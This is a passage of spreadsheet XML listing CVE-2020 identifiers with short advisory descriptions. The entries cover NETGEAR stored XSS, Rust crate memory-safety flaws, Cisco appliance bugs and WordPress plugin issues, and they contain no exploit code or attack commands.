    <t>Certain NETGEAR devices are affected by stored XSS. This affects D7800 before 1.0.1.56, R7500v2 before 1.0.3.46, R7800 before 1.0.2.74, R8900 before 1.0.4.28, R9000 before 1.0.4.28, RAX120 before 1.0.0.78, RBR20 before 2.3.5.26, RBR20 before 2.3.5.26, RBS20 before 2.3.5.26, RBK40 before 2.3.5.30, RBR40 before 2.3.5.30, RBS40 before 2.3.5.30, RBK50 before 2.3.5.30, RBR50 before 2.3.5.30, RBS50 before 2.3.5.30, XR500 before 2.3.2.56, and XR700 before 1.0.1.10.</t>
  </si>
  <si>
    <t>CVE-2020-35819</t>
  </si>
  <si>
    <t>CVE-2020-3582</t>
  </si>
  <si>
    <t>CVE-2020-35820</t>
  </si>
  <si>
    <t>CVE-2020-35821</t>
  </si>
  <si>
    <t>Certain NETGEAR devices are affected by stored XSS. This affects D7800 before 1.0.1.56, R7800 before 1.0.2.74, R8900 before 1.0.4.28, R9000 before 1.0.4.28, RAX120 before 1.0.0.78, RBK20 before 2.3.5.26, RBR20 before 2.3.5.26, RBS20 before 2.3.5.26, RBK40 before 2.3.5.30, RBR40 before 2.3.5.30, RBS40 before 2.3.5.30, RBK50 before 2.3.5.30, RBR50 before 2.3.5.30, RBS50 before 2.3.5.30, and XR700 before 1.0.1.10.</t>
  </si>
  <si>
    <t>CVE-2020-35822</t>
  </si>
  <si>
    <t>Certain NETGEAR devices are affected by stored XSS. This affects D7800 before 1.0.1.56, R7500v2 before 1.0.3.46, R7800 before 1.0.2.74, R8900 before 1.0.4.28, R9000 before 1.0.4.28, RAX120 before 1.0.0.78, XR500 before 2.3.2.56, and XR700 before 1.0.1.10.</t>
  </si>
  <si>
    <t>CVE-2020-35823</t>
  </si>
  <si>
    <t>CVE-2020-35824</t>
  </si>
  <si>
    <t>CVE-2020-35825</t>
  </si>
  <si>
    <t>CVE-2020-35826</t>
  </si>
  <si>
    <t>CVE-2020-35827</t>
  </si>
  <si>
    <t>Certain NETGEAR devices are affected by stored XSS. This affects D7800 before 1.0.1.56, RBK50 before 2.3.5.30, RBR50 before 2.3.5.30, RBS50 before 2.3.5.30, R7800 before 1.0.2.74, R8900 before 1.0.4.28, R9000 before 1.0.4.28, XR500 before 2.3.2.56, XR700 before 1.0.1.10, and RAX120 before 1.0.0.78.</t>
  </si>
  <si>
    <t>CVE-2020-35828</t>
  </si>
  <si>
    <t>Certain NETGEAR devices are affected by stored XSS. This affects D7800 before 1.0.1.56, RBK20 before 2.3.5.26, RBR20 before 2.3.5.26, RBS20 before 2.3.5.26, RBK40 before 2.3.5.30, RBR40 before 2.3.5.30, RBS40 before 2.3.5.30, RBK50 before 2.3.5.30, RBR50 before 2.3.5.30, RBS50 before 2.3.5.30, R7800 before 1.0.2.74, R8900 before 1.0.4.28, R9000 before 1.0.4.28, XR500 before 2.3.2.56, XR700 before 1.0.1.10, RAX120 before 1.0.0.78, and R7500v2 before 1.0.3.46.</t>
  </si>
  <si>
    <t>CVE-2020-35829</t>
  </si>
  <si>
    <t>CVE-2020-3583</t>
  </si>
  <si>
    <t>CVE-2020-35830</t>
  </si>
  <si>
    <t>CVE-2020-35831</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:N</t>
  </si>
  <si>
    <t>CVE-2020-35832</t>
  </si>
  <si>
    <t>CVE-2020-35833</t>
  </si>
  <si>
    <t>CVE-2020-35834</t>
  </si>
  <si>
    <t>Certain NETGEAR devices are affected by stored XSS. This affects D7800 before 1.0.1.56, R7500v2 before 1.0.3.46, R7800 before 1.0.2.68, R8900 before 1.0.4.28, R9000 before 1.0.4.28, RAX120 before 1.0.0.78, XR500 before 2.3.2.56, and XR700 before 1.0.1.10.</t>
  </si>
  <si>
    <t>CVE-2020-35835</t>
  </si>
  <si>
    <t>CVE-2020-35836</t>
  </si>
  <si>
    <t>Certain NETGEAR devices are affected by stored XSS. This affects D7800 before 1.0.1.56, R7500v2 before 1.0.3.46, R7800 before 1.0.2.74, R8900 before 1.0.4.28, R9000 before 1.0.4.28, XR500 before 2.3.2.56, XR700 before 1.0.1.10, and RAX120 before 1.0.0.78.</t>
  </si>
  <si>
    <t>CVE-2020-35837</t>
  </si>
  <si>
    <t>CVE-2020-35838</t>
  </si>
  <si>
    <t>CVE-2020-35839</t>
  </si>
  <si>
    <t>Certain NETGEAR devices are affected by Stored XSS. This affects D7800 before 1.0.1.56, R7500v2 before 1.0.3.46, R7800 before 1.0.2.68, R8900 before 1.0.4.28, R9000 before 1.0.4.28, XR500 before 2.3.2.56, XR700 before 1.0.1.10, and RAX120 before 1.0.0.78.</t>
  </si>
  <si>
    <t>CVE-2020-35840</t>
  </si>
  <si>
    <t>Certain NETGEAR devices are affected by stored XSS. This affects D6200 before 1.1.00.38, D7000 before 1.0.1.78, JNR1010v2 before 1.1.0.62, JR6150 before 1.0.1.24, JWNR2010v5 before 1.1.0.62, R6020 before 1.0.0.42, R6050 before 1.0.1.24, R6080 before 1.0.0.42, R6120 before 1.0.0.66, R6220 before 1.1.0.100, R6260 before 1.1.0.76, WNR1000v4 before 1.1.0.62, WNR2020 before 1.1.0.62, and WNR2050 before 1.1.0.62.</t>
  </si>
  <si>
    <t>CVE-2020-35841</t>
  </si>
  <si>
    <t>Certain NETGEAR devices are affected by stored XSS. This affects D6200 before 1.1.00.38, D7000 before 1.0.1.78, JNR1010v2 before 1.1.0.62, JR6150 before 1.0.1.24, JWNR2010v5 before 1.1.0.62, R6020 before 1.0.0.42, R6050 before 1.0.1.24, R6080 before 1.0.0.42, R6120 before 1.0.0.66, R6220 before 1.1.0.100, R6260 before 1.1.0.76, R6700v2 before 1.2.0.62, R6800 before 1.2.0.62, R6900v2 before 1.2.0.62, R7450 before 1.2.0.62, WNR1000v4 before 1.1.0.62, WNR2020 before 1.1.0.62, and WNR2050 before 1.1.0.62.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:H/A:N</t>
  </si>
  <si>
    <t>CVE-2020-35842</t>
  </si>
  <si>
    <t>CVE-2020-35843</t>
  </si>
  <si>
    <t>FastStone Image Viewer 7.5 has an out-of-bounds write (via a crafted image file) at FSViewer.exe+0x956e.</t>
  </si>
  <si>
    <t>CVE-2020-35844</t>
  </si>
  <si>
    <t>FastStone Image Viewer 7.5 has an out-of-bounds write (via a crafted image file) at FSViewer.exe+0xbe9c4.</t>
  </si>
  <si>
    <t>CVE-2020-35845</t>
  </si>
  <si>
    <t>FastStone Image Viewer 7.5 has an out-of-bounds write (via a crafted image file) at FSViewer.exe+0x96cf.</t>
  </si>
  <si>
    <t>CVE-2020-35846</t>
  </si>
  <si>
    <t>Agentejo Cockpit before 0.11.2 allows NoSQL injection via the Controller/Auth.php check function.</t>
  </si>
  <si>
    <t>CVE-2020-35847</t>
  </si>
  <si>
    <t>Agentejo Cockpit before 0.11.2 allows NoSQL injection via the Controller/Auth.php resetpassword function.</t>
  </si>
  <si>
    <t>CVE-2020-35848</t>
  </si>
  <si>
    <t>Agentejo Cockpit before 0.11.2 allows NoSQL injection via the Controller/Auth.php newpassword function.</t>
  </si>
  <si>
    <t>CVE-2020-35849</t>
  </si>
  <si>
    <t>An issue was discovered in MantisBT before 2.24.4. An incorrect access check in bug_revision_view_page.php allows an unprivileged attacker to view the Summary field of private issues, as well as bugnotes revisions, gaining access to potentially confidential information via the bugnote_id parameter.</t>
  </si>
  <si>
    <t>CVE-2020-3585</t>
  </si>
  <si>
    <t>A vulnerability in the TLS handler of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software for Cisco Firepower 1000 Series firewalls could allow an unauthenticated, remote attacker to gain access to sensitive information. The vulnerability is due to improper implementation of countermeasures against the Bleichenbacher attack for cipher suites that rely on RSA for key exchange. An attacker could exploit this vulnerability by sending crafted TLS messages to the device, which would act as an oracle and allow the attacker to carry out a chosen-ciphertext attack. A successful exploit could allow the attacker to perform cryptanalytic operations that may allow decryption of previously captured TLS sessions to the affected device. To exploit this vulnerability, an attacker must be able to perform both of the following actions: Capture TLS traffic that is in transit between clients and the affected device Actively establish a considerable number of TLS connections to the affected device</t>
  </si>
  <si>
    <t>CVE-2020-35850</t>
  </si>
  <si>
    <t>** DISPUTED ** An SSRF issue was discovered in cockpit-project.org Cockpit 234. NOTE: this is unrelated to the Agentejo Cockpit product. NOTE: the vendor states "I don't think [it] is a big real-life issue."</t>
  </si>
  <si>
    <t>CVE-2020-35851</t>
  </si>
  <si>
    <t>HGiga MailSherlock does not validate specific parameters properly. Attackers can use the vulnerability to launch Command inject attacks remotely and execute arbitrary commands of the system.</t>
  </si>
  <si>
    <t>CVE-2020-35852</t>
  </si>
  <si>
    <t>Chatbox is affected by cross-site scripting (XSS). An attacker has to upload any XSS payload with SVG, XML file in Chatbox. There is no restriction on file upload in Chatbox which leads to stored XSS.</t>
  </si>
  <si>
    <t>CVE-2020-35853</t>
  </si>
  <si>
    <t>4images Image Gallery Management System 1.7.11 is affected by cross-site scripting (XSS) in the Image URL. This vulnerability can result in an attacker to inject the XSS payload into the IMAGE URL. Each time a user visits that URL, the XSS triggers and the attacker can be able to steal the cookie according to the crafted payload.</t>
  </si>
  <si>
    <t>CVE-2020-35854</t>
  </si>
  <si>
    <t>Textpattern 4.8.4 is affected by cross-site scripting (XSS) in the Body parameter.</t>
  </si>
  <si>
    <t>CVE-2020-35856</t>
  </si>
  <si>
    <t>SolarWinds Orion Platform before 2020.2.5 allows stored XSS attacks by an administrator on the Customize View page.</t>
  </si>
  <si>
    <t>CVE-2020-35857</t>
  </si>
  <si>
    <t>An issue was discovered in the trust-dns-server crate before 0.18.1 for Rust. DNS MX and SRV null targets are mishandled, causing stack consumption.</t>
  </si>
  <si>
    <t>CVE-2020-35858</t>
  </si>
  <si>
    <t>An issue was discovered in the prost crate before 0.6.1 for Rust. There is stack consumption via a crafted message, causing a denial of service (e.g., x86) or possibly remote code execution (e.g., ARM).</t>
  </si>
  <si>
    <t>CVE-2020-35859</t>
  </si>
  <si>
    <t>An issue was discovered in the lucet-runtime-internals crate before 0.5.1 for Rust. It mishandles sigstack allocation. Guest programs may be able to obtain sensitive information, or guest programs can experience memory corruption.</t>
  </si>
  <si>
    <t>CVE-2020-3586</t>
  </si>
  <si>
    <t>A vulnerability in the web-based management interface of Cisco DNA Spaces Connector could allow an unauthenticated, remote attacker to execute arbitrary commands on an affected device. The vulnerability is due to insufficient validation of user-supplied input in the web-based management interface. An attacker could exploit this vulnerability by sending crafted HTTP requests to the web-based management interface. A successful exploit could allow the attacker to execute arbitrary commands on the underling operating system with privileges of the web-based management application, which is running as a restricted user. This could result in changes being made to pages served by the web-based management application impacting the integrity or availability of the web-based management application.</t>
  </si>
  <si>
    <t>CVE-2020-35860</t>
  </si>
  <si>
    <t>An issue was discovered in the cbox crate through 2020-03-19 for Rust. The CBox API allows dereferencing raw pointers without a requirement for unsafe code.</t>
  </si>
  <si>
    <t>CVE-2020-35861</t>
  </si>
  <si>
    <t>An issue was discovered in the bumpalo crate before 3.2.1 for Rust. The realloc feature allows the reading of unknown memory. Attackers can potentially read cryptographic keys.</t>
  </si>
  <si>
    <t>CVE-2020-35862</t>
  </si>
  <si>
    <t>An issue was discovered in the bitvec crate before 0.17.4 for Rust. BitVec to BitBox conversion leads to a use-after-free or double free.</t>
  </si>
  <si>
    <t>CVE-2020-35863</t>
  </si>
  <si>
    <t>An issue was discovered in the hyper crate before 0.12.34 for Rust. HTTP request smuggling can occur. Remote code execution can occur in certain situations with an HTTP server on the loopback interface.</t>
  </si>
  <si>
    <t>CVE-2020-35864</t>
  </si>
  <si>
    <t>An issue was discovered in the flatbuffers crate through 2020-04-11 for Rust. read_scalar (and read_scalar_at) can transmute values without unsafe blocks.</t>
  </si>
  <si>
    <t>CVE-2020-35865</t>
  </si>
  <si>
    <t>An issue was discovered in the os_str_bytes crate before 2.0.0 for Rust. It has false expectations about char::from_u32_unchecked behavior.</t>
  </si>
  <si>
    <t>CVE-2020-35866</t>
  </si>
  <si>
    <t>An issue was discovered in the rusqlite crate before 0.23.0 for Rust. Memory safety can be violated via VTab / VTabCursor.</t>
  </si>
  <si>
    <t>CVE-2020-35867</t>
  </si>
  <si>
    <t>An issue was discovered in the rusqlite crate before 0.23.0 for Rust. Memory safety can be violated via create_module.</t>
  </si>
  <si>
    <t>CVE-2020-35868</t>
  </si>
  <si>
    <t>An issue was discovered in the rusqlite crate before 0.23.0 for Rust. Memory safety can be violated via UnlockNotification.</t>
  </si>
  <si>
    <t>CVE-2020-35869</t>
  </si>
  <si>
    <t>An issue was discovered in the rusqlite crate before 0.23.0 for Rust. Memory safety can be violated because rusqlite::trace::log mishandles format strings.</t>
  </si>
  <si>
    <t>CVE-2020-3587</t>
  </si>
  <si>
    <t>A vulnerability in the web-based management interface of the Cisco SD-WAN vManage Software could allow an authenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user. The vulnerability exists because the web-based management interface does not properly validate user-supplied input. An attacker could exploit this vulnerability by persuading a user to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or access sensitive, browser-based information.</t>
  </si>
  <si>
    <t>CVE-2020-35870</t>
  </si>
  <si>
    <t>An issue was discovered in the rusqlite crate before 0.23.0 for Rust. Memory safety can be violated via an Auxdata API use-after-free.</t>
  </si>
  <si>
    <t>CVE-2020-35871</t>
  </si>
  <si>
    <t>An issue was discovered in the rusqlite crate before 0.23.0 for Rust. Memory safety can be violated via an Auxdata API data race.</t>
  </si>
  <si>
    <t>CVE-2020-35872</t>
  </si>
  <si>
    <t>An issue was discovered in the rusqlite crate before 0.23.0 for Rust. Memory safety can be violated via the repr(Rust) type.</t>
  </si>
  <si>
    <t>CVE-2020-35873</t>
  </si>
  <si>
    <t>An issue was discovered in the rusqlite crate before 0.23.0 for Rust. Memory safety can be violated because sessions.rs has a use-after-free.</t>
  </si>
  <si>
    <t>CVE-2020-35874</t>
  </si>
  <si>
    <t>An issue was discovered in the internment crate through 2020-05-28 for Rust. ArcIntern::drop has a race condition and resultant use-after-free.</t>
  </si>
  <si>
    <t>CVE-2020-35875</t>
  </si>
  <si>
    <t>An issue was discovered in the tokio-rustls crate before 0.13.1 for Rust. Excessive memory usage may occur when data arrives quickly.</t>
  </si>
  <si>
    <t>CVE-2020-35876</t>
  </si>
  <si>
    <t>An issue was discovered in the rio crate through 2020-05-11 for Rust. A struct can be leaked, allowing attackers to obtain sensitive information, cause a use-after-free, or cause a data race.</t>
  </si>
  <si>
    <t>CVE-2020-35877</t>
  </si>
  <si>
    <t>An issue was discovered in the ozone crate through 2020-07-04 for Rust. Memory safety is violated because of out-of-bounds access.</t>
  </si>
  <si>
    <t>CVE-2020-35878</t>
  </si>
  <si>
    <t>An issue was discovered in the ozone crate through 2020-07-04 for Rust. Memory safety is violated because of the dropping of uninitialized memory.</t>
  </si>
  <si>
    <t>CVE-2020-35879</t>
  </si>
  <si>
    <t>An issue was discovered in the rulinalg crate through 2020-02-11 for Rust. There are incorrect lifetime-boundary definitions for RowMut::raw_slice and RowMut::raw_slice_mut.</t>
  </si>
  <si>
    <t>CVE-2020-3588</t>
  </si>
  <si>
    <t>A vulnerability in virtualization channel messaging in Cisco Webex Meetings Desktop App for Windows could allow a local attacker to execute arbitrary code on a targeted system. This vulnerability occurs when this app is deployed in a virtual desktop environment and using virtual environment optimization. This vulnerability is due to improper validation of messages processed by the Cisco Webex Meetings Desktop App. A local attacker with limited privileges could exploit this vulnerability by sending malicious messages to the affected software by using the virtualization channel interface. A successful exploit could allow the attacker to modify the underlying operating system configuration, which could allow the attacker to execute arbitrary code with the privileges of a targeted user. Note: This vulnerability can be exploited only when Cisco Webex Meetings Desktop App is in a virtual desktop environment on a hosted virtual desktop (HVD) and is configured to use the Cisco Webex Meetings virtual desktop plug-in for thin clients.</t>
  </si>
  <si>
    <t>CVE-2020-35880</t>
  </si>
  <si>
    <t>An issue was discovered in the bigint crate through 2020-05-07 for Rust. It allows a soundness violation.</t>
  </si>
  <si>
    <t>CVE-2020-35881</t>
  </si>
  <si>
    <t>An issue was discovered in the traitobject crate through 2020-06-01 for Rust. It has false expectations about fat pointers, possibly causing memory corruption in, for example, Rust 2.x.</t>
  </si>
  <si>
    <t>CVE-2020-35882</t>
  </si>
  <si>
    <t>An issue was discovered in the rocket crate before 0.4.5 for Rust. LocalRequest::clone creates more than one mutable references to the same object, possibly causing a data race.</t>
  </si>
  <si>
    <t>CVE-2020-35883</t>
  </si>
  <si>
    <t>An issue was discovered in the mozwire crate through 2020-08-18 for Rust. A ../ directory-traversal situation allows overwriting local files that have .conf at the end of the filename.</t>
  </si>
  <si>
    <t>CVE-2020-35884</t>
  </si>
  <si>
    <t>An issue was discovered in the tiny_http crate through 2020-06-16 for Rust. HTTP Request smuggling can occur via a malformed Transfer-Encoding header.</t>
  </si>
  <si>
    <t>CVE-2020-35885</t>
  </si>
  <si>
    <t>An issue was discovered in the alpm-rs crate through 2020-08-20 for Rust. StrcCtx performs improper memory deallocation.</t>
  </si>
  <si>
    <t>CVE-2020-35886</t>
  </si>
  <si>
    <t>An issue was discovered in the arr crate through 2020-08-25 for Rust. An attacker can smuggle non-Sync/Send types across a thread boundary to cause a data race.</t>
  </si>
  <si>
    <t>CVE-2020-35887</t>
  </si>
  <si>
    <t>An issue was discovered in the arr crate through 2020-08-25 for Rust. There is a buffer overflow in Index and IndexMut.</t>
  </si>
  <si>
    <t>CVE-2020-35888</t>
  </si>
  <si>
    <t>An issue was discovered in the arr crate through 2020-08-25 for Rust. Uninitialized memory is dropped by Array::new_from_template.</t>
  </si>
  <si>
    <t>CVE-2020-35889</t>
  </si>
  <si>
    <t>An issue was discovered in the crayon crate through 2020-08-31 for Rust. A TOCTOU issue has a resultant memory safety violation via HandleLike.</t>
  </si>
  <si>
    <t>CVE-2020-3589</t>
  </si>
  <si>
    <t>A vulnerability in the web-based management interface of Cisco Identity Services Engine (ISE) Software could allow an authenticated, remote attacker with administrative credentials to conduct a cross-site scripting (XSS) attack against a user of the interface. The vulnerability exists because the web-based management interface does not properly validate user-supplied input. An attacker could exploit this vulnerability by injecting malicious code into specific pages of the interface. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or access sensitive, browser-based information. To exploit this vulnerability, an attacker would need to have valid administrative credentials.</t>
  </si>
  <si>
    <t>CVE-2020-35890</t>
  </si>
  <si>
    <t>An issue was discovered in the ordnung crate through 2020-09-03 for Rust. compact::Vec violates memory safety via out-of-bounds access for large capacity.</t>
  </si>
  <si>
    <t>CVE-2020-35891</t>
  </si>
  <si>
    <t>An issue was discovered in the ordnung crate through 2020-09-03 for Rust. compact::Vec violates memory safety via a remove() double free.</t>
  </si>
  <si>
    <t>CVE-2020-35892</t>
  </si>
  <si>
    <t>An issue was discovered in the simple-slab crate before 0.3.3 for Rust. index() allows an out-of-bounds read.</t>
  </si>
  <si>
    <t>CVE-2020-35893</t>
  </si>
  <si>
    <t>An issue was discovered in the simple-slab crate before 0.3.3 for Rust. remove() has an off-by-one error, causing memory leakage and a drop of uninitialized memory.</t>
  </si>
  <si>
    <t>CVE-2020-35894</t>
  </si>
  <si>
    <t>An issue was discovered in the obstack crate before 0.1.4 for Rust. Unaligned references can occur.</t>
  </si>
  <si>
    <t>CVE-2020-35895</t>
  </si>
  <si>
    <t>An issue was discovered in the stack crate before 0.3.1 for Rust. ArrayVec has an out-of-bounds write via element insertion.</t>
  </si>
  <si>
    <t>CVE-2020-35896</t>
  </si>
  <si>
    <t>An issue was discovered in the ws crate through 2020-09-25 for Rust. The outgoing buffer is not properly limited, leading to a remote memory-consumption attack.</t>
  </si>
  <si>
    <t>CVE-2020-35897</t>
  </si>
  <si>
    <t>An issue was discovered in the atom crate before 0.3.6 for Rust. An unsafe Send implementation allows a cross-thread data race.</t>
  </si>
  <si>
    <t>CVE-2020-35898</t>
  </si>
  <si>
    <t>An issue was discovered in the actix-utils crate before 2.0.0 for Rust. The Cell implementation allows obtaining more than one mutable reference to the same data.</t>
  </si>
  <si>
    <t>CVE-2020-35899</t>
  </si>
  <si>
    <t>An issue was discovered in the actix-service crate before 1.0.6 for Rust. The Cell implementation allows obtaining more than one mutable reference to the same data.</t>
  </si>
  <si>
    <t>CVE-2020-3590</t>
  </si>
  <si>
    <t>CVE-2020-35900</t>
  </si>
  <si>
    <t>An issue was discovered in the array-queue crate through 2020-09-26 for Rust. A pop_back() call may lead to a use-after-free.</t>
  </si>
  <si>
    <t>CVE-2020-35901</t>
  </si>
  <si>
    <t>An issue was discovered in the actix-http crate before 2.0.0-alpha.1 for Rust. There is a use-after-free in BodyStream.</t>
  </si>
  <si>
    <t>CVE-2020-35902</t>
  </si>
  <si>
    <t>An issue was discovered in the actix-codec crate before 0.3.0-beta.1 for Rust. There is a use-after-free in Framed.</t>
  </si>
  <si>
    <t>CVE-2020-35903</t>
  </si>
  <si>
    <t>An issue was discovered in the dync crate before 0.5.0 for Rust. VecCopy allows misaligned element access because u8 is not always the type in question.</t>
  </si>
  <si>
    <t>CVE-2020-35904</t>
  </si>
  <si>
    <t>An issue was discovered in the crossbeam-channel crate before 0.4.4 for Rust. It has incorrect expectations about the relationship between the memory allocation and how many iterator elements there are.</t>
  </si>
  <si>
    <t>CVE-2020-35905</t>
  </si>
  <si>
    <t>An issue was discovered in the futures-util crate before 0.3.7 for Rust. MutexGuard::map can cause a data race for certain closure situations (in safe code).</t>
  </si>
  <si>
    <t>CVE-2020-35906</t>
  </si>
  <si>
    <t>An issue was discovered in the futures-task crate before 0.3.6 for Rust. futures_task::waker may cause a use-after-free in a non-static type situation.</t>
  </si>
  <si>
    <t>CVE-2020-35907</t>
  </si>
  <si>
    <t>An issue was discovered in the futures-task crate before 0.3.5 for Rust. futures_task::noop_waker_ref allows a NULL pointer dereference.</t>
  </si>
  <si>
    <t>CVE-2020-35908</t>
  </si>
  <si>
    <t>An issue was discovered in the futures-util crate before 0.3.2 for Rust. FuturesUnordered can lead to data corruption because Sync is mishandled.</t>
  </si>
  <si>
    <t>CVE-2020-35909</t>
  </si>
  <si>
    <t>An issue was discovered in the multihash crate before 0.11.3 for Rust. The from_slice parsing code can panic via unsanitized data from a network server.</t>
  </si>
  <si>
    <t>CVE-2020-3591</t>
  </si>
  <si>
    <t>CVE-2020-35910</t>
  </si>
  <si>
    <t>An issue was discovered in the lock_api crate before 0.4.2 for Rust. A data race can occur because of MappedMutexGuard unsoundness.</t>
  </si>
  <si>
    <t>CVE-2020-35911</t>
  </si>
  <si>
    <t>An issue was discovered in the lock_api crate before 0.4.2 for Rust. A data race can occur because of MappedRwLockReadGuard unsoundness.</t>
  </si>
  <si>
    <t>CVE-2020-35912</t>
  </si>
  <si>
    <t>An issue was discovered in the lock_api crate before 0.4.2 for Rust. A data race can occur because of MappedRwLockWriteGuard unsoundness.</t>
  </si>
  <si>
    <t>CVE-2020-35913</t>
  </si>
  <si>
    <t>An issue was discovered in the lock_api crate before 0.4.2 for Rust. A data race can occur because of RwLockReadGuard unsoundness.</t>
  </si>
  <si>
    <t>CVE-2020-35914</t>
  </si>
  <si>
    <t>An issue was discovered in the lock_api crate before 0.4.2 for Rust. A data race can occur because of RwLockWriteGuard unsoundness.</t>
  </si>
  <si>
    <t>CVE-2020-35915</t>
  </si>
  <si>
    <t>An issue was discovered in the futures-intrusive crate before 0.4.0 for Rust. GenericMutexGuard allows cross-thread data races of non-Sync types.</t>
  </si>
  <si>
    <t>CVE-2020-35916</t>
  </si>
  <si>
    <t>An issue was discovered in the image crate before 0.23.12 for Rust. A Mutable reference has immutable provenance. (In the case of LLVM, the IR may be always correct.)</t>
  </si>
  <si>
    <t>CVE-2020-35917</t>
  </si>
  <si>
    <t>An issue was discovered in the pyo3 crate before 0.12.4 for Rust. There is a reference-counting error and use-after-free in From&lt;Py&lt;T&gt;&gt;.</t>
  </si>
  <si>
    <t>CVE-2020-35918</t>
  </si>
  <si>
    <t>An issue was discovered in the branca crate before 0.10.0 for Rust. Decoding tokens (with invalid base62 data) can panic.</t>
  </si>
  <si>
    <t>CVE-2020-35919</t>
  </si>
  <si>
    <t>An issue was discovered in the net2 crate before 0.2.36 for Rust. It has false expectations about the std::net::SocketAddr memory representation.</t>
  </si>
  <si>
    <t>CVE-2020-3592</t>
  </si>
  <si>
    <t>A vulnerability in the web-based management interface of Cisco SD-WAN vManage Software could allow an authenticated, remote attacker to bypass authorization and modify the configuration of an affected system. The vulnerability is due to insufficient authorization checking on an affected system. An attacker could exploit this vulnerability by sending crafted HTTP requests to the web-based management interface of an affected system. A successful exploit could allow the attacker to gain privileges beyond what would normally be authorized for their configured user authorization level. This could allow the attacker to modify the configuration of an affected system.</t>
  </si>
  <si>
    <t>CVE-2020-35920</t>
  </si>
  <si>
    <t>An issue was discovered in the socket2 crate before 0.3.16 for Rust. It has false expectations about the std::net::SocketAddr memory representation.</t>
  </si>
  <si>
    <t>CVE-2020-35921</t>
  </si>
  <si>
    <t>An issue was discovered in the miow crate before 0.3.6 for Rust. It has false expectations about the std::net::SocketAddr memory representation.</t>
  </si>
  <si>
    <t>CVE-2020-35922</t>
  </si>
  <si>
    <t>An issue was discovered in the mio crate before 0.7.6 for Rust. It has false expectations about the std::net::SocketAddr memory representation.</t>
  </si>
  <si>
    <t>CVE-2020-35923</t>
  </si>
  <si>
    <t>An issue was discovered in the ordered-float crate before 1.1.1 and 2.x before 2.0.1 for Rust. A NotNan value can contain a NaN.</t>
  </si>
  <si>
    <t>CVE-2020-35924</t>
  </si>
  <si>
    <t>An issue was discovered in the try-mutex crate before 0.3.0 for Rust. TryMutex&lt;T&gt; allows cross-thread sending of a non-Send type.</t>
  </si>
  <si>
    <t>CVE-2020-35925</t>
  </si>
  <si>
    <t>An issue was discovered in the magnetic crate before 2.0.1 for Rust. MPMCConsumer and MPMCProducer allow cross-thread sending of a non-Send type.</t>
  </si>
  <si>
    <t>CVE-2020-35926</t>
  </si>
  <si>
    <t>An issue was discovered in the nanorand crate before 0.5.1 for Rust. It caused any random number generator (even ChaCha) to return all zeroes because integer truncation was mishandled.</t>
  </si>
  <si>
    <t>CVE-2020-35927</t>
  </si>
  <si>
    <t>An issue was discovered in the thex crate through 2020-12-08 for Rust. Thex&lt;T&gt; allows cross-thread data races of non-Send types.</t>
  </si>
  <si>
    <t>CVE-2020-35928</t>
  </si>
  <si>
    <t>An issue was discovered in the concread crate before 0.2.6 for Rust. Attackers can cause an ARCache&lt;K,V&gt; data race by sending types that do not implement Send/Sync.</t>
  </si>
  <si>
    <t>CVE-2020-35929</t>
  </si>
  <si>
    <t>In TinyCheck before commits 9fd360d and ea53de8, the installation script of the tool contained hard-coded credentials to the backend part of the tool. This information could be used by an attacker for unauthorized access to remote data.</t>
  </si>
  <si>
    <t>CVE-2020-3593</t>
  </si>
  <si>
    <t>A vulnerability in Cisco SD-WAN Software could allow an authenticated, local attacker to elevate privileges to root on the underlying operating system. The vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by sending a crafted request to a utility that is running on an affected system. A successful exploit could allow the attacker to gain root privileges.</t>
  </si>
  <si>
    <t>CVE-2020-35930</t>
  </si>
  <si>
    <t>Seo Panel 4.8.0 allows stored XSS by an Authenticated User via the url parameter, as demonstrated by the seo/seopanel/websites.php URI.</t>
  </si>
  <si>
    <t>CVE-2020-35931</t>
  </si>
  <si>
    <t>An issue was discovered in Foxit Reader before 10.1.1 (and before 4.1.1 on macOS) and PhantomPDF before 9.7.5 and 10.x before 10.1.1 (and before 4.1.1 on macOS). An attacker can spoof a certified PDF document via an Evil Annotation Attack because the products fail to consider a null value for a Subtype entry of the Annotation dictionary, in an incremental update.</t>
  </si>
  <si>
    <t>CVE-2020-35932</t>
  </si>
  <si>
    <t>Insecure Deserialization in the Newsletter plugin before 6.8.2 for WordPress allows authenticated remote attackers with minimal privileges (such as subscribers) to use the tpnc_render AJAX action to inject arbitrary PHP objects via the options[inline_edits] parameter. NOTE: exploitability depends on PHP objects that might be present with certain other plugins or themes.</t>
  </si>
  <si>
    <t>CVE-2020-35933</t>
  </si>
  <si>
    <t>A Reflected Authenticated Cross-Site Scripting (XSS) vulnerability in the Newsletter plugin before 6.8.2 for WordPress allows remote attackers to trick a victim into submitting a tnpc_render AJAX request containing either JavaScript in an options parameter, or a base64-encoded JSON string containing JavaScript in the encoded_options parameter.</t>
  </si>
  <si>
    <t>CVE-2020-35934</t>
  </si>
  <si>
    <t>The Advanced Access Manager plugin before 6.6.2 for WordPress displays the unfiltered user object (including all metadata) upon login via the REST API (aam/v1/authenticate or aam/v2/authenticate). This is a security problem if this object stores information that the user is not supposed to have (e.g., custom metadata added by a different plugin).</t>
  </si>
  <si>
    <t>CVE-2020-35935</t>
  </si>
  <si>
    <t>The Advanced Access Manager plugin before 6.6.2 for WordPress allows privilege escalation on profile updates via the aam_user_roles POST parameter if Multiple Role support is enabled. (The mechanism for deciding whether a user was entitled to add a role did not work in various custom-role scenarios.)</t>
  </si>
  <si>
    <t>CVE-2020-35936</t>
  </si>
  <si>
    <t>Stored Cross-Site Scripting (XSS) vulnerabilities in the Post Grid plugin before 2.0.73 for WordPress allow remote authenticated attackers to import layouts including JavaScript supplied via a remotely hosted crafted payload in the source parameter via AJAX. The action must be set to post_grid_import_xml_layouts.</t>
  </si>
  <si>
    <t>CVE-2020-35937</t>
  </si>
  <si>
    <t>Stored Cross-Site Scripting (XSS) vulnerabilities in the Team Showcase plugin before 1.22.16 for WordPress allow remote authenticated attackers to import layouts including JavaScript supplied via a remotely hosted crafted payload in the source parameter via AJAX. The action must be set to team_import_xml_layouts.</t>
  </si>
  <si>
    <t>CVE-2020-35938</t>
  </si>
  <si>
